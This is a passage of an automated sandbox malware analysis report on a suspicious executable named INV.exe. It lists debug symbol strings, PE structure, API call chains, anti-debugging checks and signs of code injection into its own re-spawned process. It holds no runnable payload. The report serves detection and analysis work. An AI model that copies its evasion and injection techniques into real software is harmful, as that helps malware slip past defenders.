          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000007.00000003.662436848.0000000004FDE000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERD26.tmp.dmp.7.dr
          Source: Binary string: mscoree.pdbs^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb[^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp, WERD26.tmp.dmp.7.dr
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.658722034.0000000002FCF000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdba^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.662424702.0000000004FD4000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdbk source: WerFault.exe, 00000007.00000003.662424702.0000000004FD4000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000007.00000003.658590255.0000000002FCA000.00000004.00000001.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdbo^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: .pdbEE source: WerFault.exe, 00000007.00000003.662359081.0000000004EF2000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010821EE push ecx; ret 0_2_01082201
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A05B2 pushfd ; retf 0_2_010A05ED
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010AF402 push eax; ret 0_2_010AF408
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010AF46C push eax; ret 0_2_010AF472
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01062835 push ecx; ret 0_2_01062848
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8864 push edx; retf 0_2_010A8884
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01099B83 push es; ret 0_2_01099B93
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01099A9E push ss; ret 0_2_01099AEC
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0107EDC0 push eax; ret 0_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01096C15 push eax; iretd 0_2_01096C16
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8C60 push ds; retf 0_2_010A8C61
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8F2B push ecx; ret 0_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8F24 push ecx; ret 0_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0107EE70 push eax; ret 0_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01062835 push ecx; ret 2_2_01062848
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010821EE push ecx; ret 3_2_01082201
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A05B2 pushfd ; retf 3_2_010A05ED
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010AF402 push eax; ret 3_2_010AF408
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010AF46C push eax; ret 3_2_010AF472
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01062835 push ecx; ret 3_2_01062848
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8864 push edx; retf 3_2_010A8884
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01099B83 push es; ret 3_2_01099B93
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01099A9E push ss; ret 3_2_01099AEC
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0107EDC0 push eax; ret 3_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01096C15 push eax; iretd 3_2_01096C16
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8C60 push ds; retf 3_2_010A8C61
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8F2B push ecx; ret 3_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8F24 push ecx; ret 3_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0107EE70 push eax; ret 3_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401F16 push ecx; ret 4_2_00401F29
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01061BC7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01061BC7
          Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\SysWOW64\WerFault.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0109BDC0 rdtsc 0_2_0109BDC0
          Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00404A29 FindFirstFileExW,4_2_00404A29
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 00000007.00000002.724149212.0000000004BF2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0?
          Source: WerFault.exe, 00000007.00000002.724219863.0000000004C50000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INV.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\INV.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0109BDC0 rdtsc 0_2_0109BDC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010683A4 IsDebuggerPresent,0_2_010683A4
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010656BA EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_010656BA
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01077800 mov eax, dword ptr fs:[00000030h]0_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01077800 mov eax, dword ptr fs:[00000030h]0_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010802BD mov eax, dword ptr fs:[00000030h]0_2_010802BD
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010838C9 mov eax, dword ptr fs:[00000030h]0_2_010838C9
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01077A20 mov eax, dword ptr fs:[00000030h]0_2_01077A20
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01080D23 mov eax, dword ptr fs:[00000030h]0_2_01080D23
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01080C83 mov eax, dword ptr fs:[00000030h]0_2_01080C83
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01080CC0 mov eax, dword ptr fs:[00000030h]0_2_01080CC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01077800 mov eax, dword ptr fs:[00000030h]2_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01077800 mov eax, dword ptr fs:[00000030h]2_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01077A20 mov eax, dword ptr fs:[00000030h]2_2_01077A20
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01077800 mov eax, dword ptr fs:[00000030h]3_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01077800 mov eax, dword ptr fs:[00000030h]3_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010802BD mov eax, dword ptr fs:[00000030h]3_2_010802BD
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010838C9 mov eax, dword ptr fs:[00000030h]3_2_010838C9
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01077A20 mov eax, dword ptr fs:[00000030h]3_2_01077A20
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01080D23 mov eax, dword ptr fs:[00000030h]3_2_01080D23
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01080C83 mov eax, dword ptr fs:[00000030h]3_2_01080C83
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01080CC0 mov eax, dword ptr fs:[00000030h]3_2_01080CC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_004035F1 mov eax, dword ptr fs:[00000030h]4_2_004035F1
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01061DB2 GetProcessHeap,0_2_01061DB2
          Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010630B6 SetUnhandledExceptionFilter,0_2_010630B6
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010630E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_010630E7
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010630B6 SetUnhandledExceptionFilter,2_2_010630B6
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010630E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_010630E7
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010630B6 SetUnhandledExceptionFilter,3_2_010630B6
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010630E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_010630E7
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401E1D SetUnhandledExceptionFilter,4_2_00401E1D
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040446F
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00401C88
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00401F30
          Source: C:\Users\user\Desktop\INV.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INV.exeSection loaded: unknown target: C:\Users\user\Desktop\INV.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01082365 cpuid 0_2_01082365
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_0106E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_010660C8
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,0_2_0106E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_0106E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0106755A
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,0_2_0106458E
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0106E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0106E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,0_2_0106771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_0106E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_0106A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,0_2_010677A3
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_010666CA
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_0106E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0106E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0106E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_01065C88
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_0106E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_0106E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0106755A
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0106458E
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_0106E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0106E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0106E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_01065C88
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0106E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_010660C8
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0106E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,2_2_0106771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_0106E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0106A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,2_2_010677A3
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,2_2_0106E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_010666CA
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_0106E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,3_2_010660C8
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,3_2_0106E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_0106E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_0106755A
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,3_2_0106458E
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_0106E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_0106E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,3_2_0106771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_0106E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,3_2_0106A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,3_2_010677A3
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlo